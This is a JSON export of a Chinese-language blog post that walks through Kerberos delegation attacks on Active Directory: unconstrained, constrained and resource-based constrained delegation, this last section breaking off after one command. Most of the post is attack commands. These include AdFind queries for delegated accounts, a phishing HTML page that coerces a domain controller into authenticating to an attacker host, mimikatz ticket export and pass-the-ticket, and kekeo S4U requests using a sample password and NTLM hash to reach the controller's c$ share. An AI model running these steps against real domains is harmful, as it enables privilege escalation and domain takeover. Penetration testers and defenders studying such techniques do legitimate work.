{"id":77,"date":"2024-03-29T10:00:00","date_gmt":"2023-05-18T02:00:00","guid":{"rendered":"http:\/\/123.207.45.199\/index.php\/2023\/05\/18\/%e5%a7%94%e6%b4%be%e6%94%bb%e5%87%bb\/"},"modified":"2026-05-31T21:58:44","modified_gmt":"2026-05-31T13:58:44","slug":"%e5%a7%94%e6%b4%be%e6%94%bb%e5%87%bb","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2024\/03\/29\/%e5%a7%94%e6%b4%be%e6%94%bb%e5%87%bb\/","title":{"rendered":"\u59d4\u6d3e\u653b\u51fb"},"content":{"rendered":"\n

\u7ea6\u675f\u59d4\u6d3e\uff1a\u9996\u5148\u5224\u65ad\u59d4\u6d3e\u7684\u7b2c\u4e8c\u4e2a\u8bbe\u7f6e\uff0c\u7136\u540e\u770b\u9488\u5bf9\u7528\u6237\uff0c\u540e\u7eed\u9493\u9c7c\u914d\u5408\n\u975e\u7ea6\u675f\u59d4\u6d3e\uff1a\u9996\u5148\u5224\u65ad\u59d4\u6d3e\u7684\u7b2c\u4e09\u4e2a\u8bbe\u7f6e\uff0c\u7136\u540e\u770b\u9488\u5bf9\u7528\u6237\uff0c\u4e3b\u52a8\u653b\u51fb\n\u8d44\u6e90\u7ea6\u675f\u59d4\u6d3e\uff1a\u53ea\u770bDC\u662f\u4e0d\u662f2012\u53ca\u4ee5\u4e0a\u5e2e\u7248\u672c\uff0c\u7136\u540e\u770b\u9488\u5bf9\u7528\u6237\uff0c\u4e3b\u52a8\u653b\u51fb<\/p>\n\n\n\n

\u59d4\u6d3e\u653b\u51fb<\/h2>\n\n\n\n
\u57df\u59d4\u6d3e\u662f\u4ec0\u4e48\uff1f\n\u662f\u5c06\u57df\u7528\u6237A\u7684\u6743\u9650\u59d4\u6d3e\u7ed9\u670d\u52a1\u8d26\u53f7B,\u59d4\u6d3e\u4e4b\u540e\uff0c\u670d\u52a1\u8d26\u53f7B\u5c31\u53ef\u4ee5\u4ee5\u57df\u7528\u6237A\u7684\u8eab\u4efd\u53bb\u505a\u57df\u7528\u6237\u80fd\u591f\u505a\u7684\u4e8b\n\u6ce8\u610f\uff1a\u80fd\u591f\u88ab\u59d4\u6d3e\u7684\u7528\u6237\u53ea\u80fd\u662f\u670d\u52a1\u8d26\u53f7\u6216\u8005\u673a\u5668\u8d26\u53f7\n1.\u673a\u5668\u8d26\u6237\uff1a\u6d3b\u52a8\u76ee\u5f55\u4e2d\u7684computers\u7ec4\u5185\u7684\u8ba1\u7b97\u673a\uff0c\u4e5f\u88ab\u79f0\u4e3a\u673a\u5668\u8d26\u53f7\u3002\n2.\u670d\u52a1\u8d26\u53f7\uff1a\u57df\u5185\u7528\u6237\u7684\u4e00\u79cd\u7c7b\u578b\uff0c\u662f\u670d\u52a1\u5668\u8fd0\u884c\u670d\u52a1\u65f6\u6240\u7528\u7684\u8d26\u53f7\uff0c\u5c06\u670d\u52a1\u8fd0\u884c\u8d77\u6765\u52a0\u5165\u57df\u5185\uff0c\u6bd4\u5982\uff1aSQLServer,MYSQL\u7b49\uff0c\u8fd8\u6709\u5c31\u662f\u57df\u7528\u6237\u901a\u8fc7\u4e0a\u518cSPN\u4e5f\u80fd\u6210\u4e3a\u670d\u52a1\u8d26\u53f7\u3002\n\u670d\u52a1\u8d26\u53f7(Service Account),\u57df\u5185\u7528\u6237\u7684\u4e00\u79cd\u7c7b\u578b\uff0c\u670d\u52a1\u5668\u8fd0\u884c\u670d\u52a1\u65f6\u6240\u7528\u7684\u8d26\u53f7\uff0c\u5c06\u670d\u52a1\u8fd0\u884c\u8d77\u6765\u5e76\u52a0\u5165\u57df\u3002\u5c31\u6bd4\u5982SQL Server\u5728\u5b89\u88c5\u65f6\uff0c\u4f1a\u5728\u57df\u5185\u81ea\u52a8\u6ce8\u518c\u670d\u52a1\u8d26\u53f7SqlServiceAccount,\u8fd9\u7c7b\u8d26\u53f7\u4e0d\u80fd\u7528\u4e8e\u4ea4\u4e92\u5f0f\u767b\u5f55\u3002<\/code><\/pre>\n\n\n\n
\u975e\u7ea6\u675f\u6027\u59d4\u6d3e<\/h3>\n\n\n\n
=>\u9700\u8981\u9493\u9c7c (\u57df\u63a7\u673a\u8bbf\u95ee\u6ca6\u9677\u673a\u5668 =>\u5c06 \u7968\u636e\u5e26\u7ed9\u5b83)<\/p>\n\n\n\n
\u539f\u7406:\n\u673a\u5668A(\u57df\u63a7)\u8bbf\u95ee\u5177\u6709\u975e\u7ea6\u675f\u59d4\u6d3e\u6743\u9650\u7684\u673a\u5668B\u7684\u670d\u52a1\uff0c\u4f1a\u628a\u5f53\u524d\u8ba4\u8bc1\u7528\u6237\uff08\u57df\u7ba1\u7528\u6237\uff09\u7684\u7684TGT\u653e\u5728ST\u7968\u636e\u4e2d\uff0c\u4e00\u8d77\u53d1\n\u9001\u7ed9\u673a\u5668B,\u673a\u5668B\u4f1a\u628aTGT\u5b58\u50a8\u5728lsss\u8fdb\u7a0b\u4e2d\u4ee5\u5907\u4e0b\u6b21\u91cd\u7528\u3002\u4ece\u800c\u673a\u5668B\u5c31\u80fd\u4f7f\u7528\u8fd9\u4e2aTGT\u6a21\u62df\u8ba4\u8bc1\u7528\u6237\uff08\u57df\u7ba1\u7528\u6237\uff09\u8bbf\n\u95ee\u670d\u52a1\u3002<\/code><\/pre>\n\n\n\n
\u73af\u5883\u642d\u5efa<\/p>\n\n\n\n
\u57df\u63a7=>\u670d\u52a1\u5668\u7ba1\u7406\u5668=>\u627e\u5230\u57df=>(\u7ed9computers\u548cusers\u4e0a\u7684\u670d\u52a1\u5668\u548c\u7528\u6237\u540d\u7ed9\u4e0a\u9009\u9879\u7b2c\u4e8c\u4e2a\u59d4\u6d3e) webserver\/webadmin\ncmd ====> setspn -U -A priv\/test webadmin \/\/ \u5237\u65b0\u914d\u7f6e<\/code><\/pre>\n\n\n\n
\u5229\u7528<\/p>\n\n\n\n
Adfind\n\u67e5\u8be2\u57df\u5185\u8bbe\u7f6e\u4e86\u975e\u7ea6\u675f\u59d4\u6d3e\u7684--\u670d\u52a1\u8d26\u6237\uff1a\nAdFind.exe -h 192.168.3.21 -b \"DC=god,DC=org\" -f \"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))\" dn\n\n\u67e5\u8be2\u57df\u5185\u8bbe\u7f6e\u4e86\u975e\u7ea6\u675f\u59d4\u6d3e\u7684--\u673a\u5668\u8d26\u6237:\nAdFind.exe -h 192.168.3.21 -b \"DC=god,DC=org\" -f \"(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))\" dn\n\n\u57df\u63a7\u673a:\n\u57df\u63a7\u4e3b\u673a\u4e3b\u52a8\u8fd0\u884c\u547d\u4ee4:\nnet use  \\\\webserver\n\u6216\u8005\u57df\u63a7\u4e3b\u673a\n\u70b9\u51fb\u4e86\u9493\u9c7c\u94fe\u63a5http:\/\/192.168.3.31\/31.html\n<!DOCTYPE htm1>\n<htmI>\n<head>\n<title><\/title>\n<\/head>\n<body>\n< img src=\"file:\/\/\/\\\\192.168.3.31\\2\"><\/body><\/html>\n\n\n\u5bfc\u51fa\u7968\u636e\u5230\u672c\u5730\nmimikatz sekurlsa::tickets \/export\n\n\u5bfc\u5165\u7968\u636e\u5230\u5185\u5b58 \u7968\u636e\u540d\u4e3a\u4e0a\u65b9\u547d\u4ee4\u67e5\u8be2\tadministrator\u7684\nmimikatz kerberos::ptt [0;16a972]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi\n\n\u8fde\u63a5\u901a\u8baf\u57df\u63a7\ndir \\\\owa2010cn-god\\c$<\/code><\/pre>\n\n\n\n
\u7ea6\u675f\u6027\u59d4\u6d3e<\/h3>\n\n\n\n
03\u5e74\u5f15\u5165\t\t\u53ea\u80fd\u8bbf\u95ee\u6307\u5b9a\u673a\u5668\u7684\u6307\u5b9a\u670d\u52a1     <\/p>\n\n\n\n
\u73af\u5883\u642d\u5efa<\/p>\n\n\n\n
\u57df\u63a7=>\u670d\u52a1\u5668\u7ba1\u7406\u5668=>\u627e\u5230\u57df=>(\u7ed9computers\u548cusers\u4e0a\u7684\u670d\u52a1\u5668\u548c\u7528\u6237\u540d\u7ed9\u4e0a\u59d4\u6d3e(\u9009\u62e9\u57df\u63a7\u673a\u5668=>cifs\u670d\u52a1)) \ncmd ====> setspn -U -A priv\/test webadmin \/\/ \u5237\u65b0\u914d\u7f6e<\/code><\/pre>\n\n\n\n
\u5229\u7528<\/p>\n\n\n\n
webserver\u64cd\u4f5c:\n\u67e5\u8be2\u662f\u5426\u914d\u7f6e\u59d4\u6d3e\t\t\tAdfind\n\u67e5\u8be2\u673a\u5668\u7528\u6237\uff08\u4e3b\u673a\uff09\u914d\u7f6e\u7ea6\u675f\u59d4\u6d3e\nAdFind.exe -h 192.168.3.21 -b \"DC=god,DC=org\" -f \"(&(samAccountType=805306369)(msds-allowedtodelegateto=*))\" msds-allowedtodelegateto\n\u67e5\u8be2\u670d\u52a1\u8d26\u6237\uff08\u4e3b\u673a\uff09\u914d\u7f6e\u7ea6\u675f\u59d4\u6d3e\nAdFind.exe -h 192.168.3.21 -b \"DC=god,DC=org\" -f \"(&(samAccountType=805306368)(msds-allowedtodelegateto=*))\" msds-allowedtodelegateto\n\n1\u3001\u83b7\u53d6\u7528\u6237\u7684\u7968\u636e\uff08\u56fe\uff1a\u83b7\u53d6\u5230\u7968\u636e\uff09\t\t\tkeke\u70c2\u571f\u8c46\t\t\t\t\n(\u4f7f\u7528\u8d26\u53f7\/\u5bc6\u7801)\nkekeo.exe \"tgt::ask \/user:webadmin \/password::admin!@#45 \/domain:GOD.ORG  \/ticket:administrator.kirbi\" \"exit\"\n\t\t\t\t---\u5bc6\u7801\u4e0d\u884c\u5c31\u8bd5\u8bd5\u54c8\u5e0c\u7684\n(\u4f7f\u7528\u8d26\u53f7\/\u54c8\u5e0c)\nkekeo.exe \"tgt::ask \/user:webadmin \/domain:god.org \/NTLM:518b98ad4178a53695dc997aa02d455c \/ticket:administrator.kirbi\" \"exit\"\n\n2.\u5229\u7528\u7528\u6237\u7968\u636e\u83b7\u53d6\u57df\u63a7\u7968\u636e tgt\u4e3a\u4e0a\u4e00\u6b65\u83b7\u53d6\u7684\u7968\u636e\u540d\u79f0\nkekeo.exe \"tgs::s4u \/tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi \/user:Administrator@god.org \/service:cifs\/owa2010cn-god.god.org\" \"exit\"\n\n3.\u5bfc\u5165\u7968\u636e\u5230\u5185\u5b58\tmimikatz  ptt\u4e3acifs\u670d\u52a1\u7684\u7968\u636e\nmimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org@GOD.ORG.kirbi\n\nshell dir \\\\owa2010cn-god.god.org\\c$<\/code><\/pre>\n\n\n\n
\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e<\/h3>\n\n\n\n
12\u5e74\u4ee5\u4e0a \u4e14 \u4e24\u53f0\u673a\u5668\u8d26\u53f7\u4e00\u81f4,\u4e00\u53f0\u673a\u5668\u62ff\u5230\u9ad8\u6743\u9650\u53ef\u79fb\u52a8\u5230\u53e6\u4e00\u53f0(\u4e00\u4e2a\u7528\u6237\u52a0\u5165\u4e86\u4e24\u53f0\u673a\u5668)    \u5b58\u5728\u57df\u5185\u6210\u5458\u7528\u6237\u52a0\u5165\u57df\u64cd\u4f5c<\/p>\n\n\n\n
\u6a2a\u5411\u79fb\u52a8 =>\u5230\u4e0d\u4e86\u57df\u63a7\tRBCD<\/p>\n\n\n\n
\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e(RBCD)\u662f\u5728Windows Server2012\u4e2d\u65b0\u52a0\u5165\u7684\u529f\u80fd\uff0c\u4e0e\u4f20\u7edf\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\uff0c\u5b83\u4e0d\u518d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\u76f8\u5173\u5c5e\u6027\u3002RBCD\u628a\u8bbe\u7f6e\u59d4\u6d3e\u7684\u6743\u9650\u8d4b\u4e88\u4e86\u673a\u5668\u81ea\u8eab\uff0c\u65e2\u673a\u5668\u81ea\u5df1\u53ef\u4ee5\u51b3\u5b9a\u8c01\u53ef\u4ee5\u88ab\u59d4\u6d3e\u6765\u63a7\u5236\u6211\u3002\u4e5f\u5c31\u662f\u8bf4\u673a\u5668\u81ea\u8eab\u53ef\u4ee5\u76f4\u63a5\u5728\u81ea\u5df1\u8d26\u6237\u4e0a\u914d\u7f6emsDS-A11 owedToActonBeha1 fofotherIdentity\u5c5e\u6027\u6765\u8bbe\u7f6eRBCD\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528<\/p>\n\n\n\n
AdFind\u5de5\u5177\u83b7\u53d6\u4fe1\u606f\nAdFind.exe -h 192.168.8.11 -b \"DC=redteam,DC=test\" -f \"objectClass=computer\" mS-DS-CreatorSID\n\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u7ea6\u675f\u59d4\u6d3e\uff1a\u9996\u5148\u5224\u65ad\u59d4\u6d3e\u7684\u7b2c\u4e8c\u4e2a\u8bbe\u7f6e\uff0c\u7136\u540e\u770b\u9488\u5bf9\u7528\u6237\uff0c\u540e\u7eed\u9493\u9c7c\u914d\u5408 \u975e\u7ea6\u675f\u59d4\u6d3e\uff1a\u9996\u5148\u5224\u65ad\u59d4\u6d3e\u7684\u7b2c\u4e09\u4e2a\u8bbe\u7f6e\uff0c\u7136\u540e\u770b … <\/p>\n","protected":false},"author":3,"featured_media":79,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-77","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/77","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=77"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions"}],"predecessor-version":[{"id":138,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions\/138"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/79"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=77"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=77"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=77"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}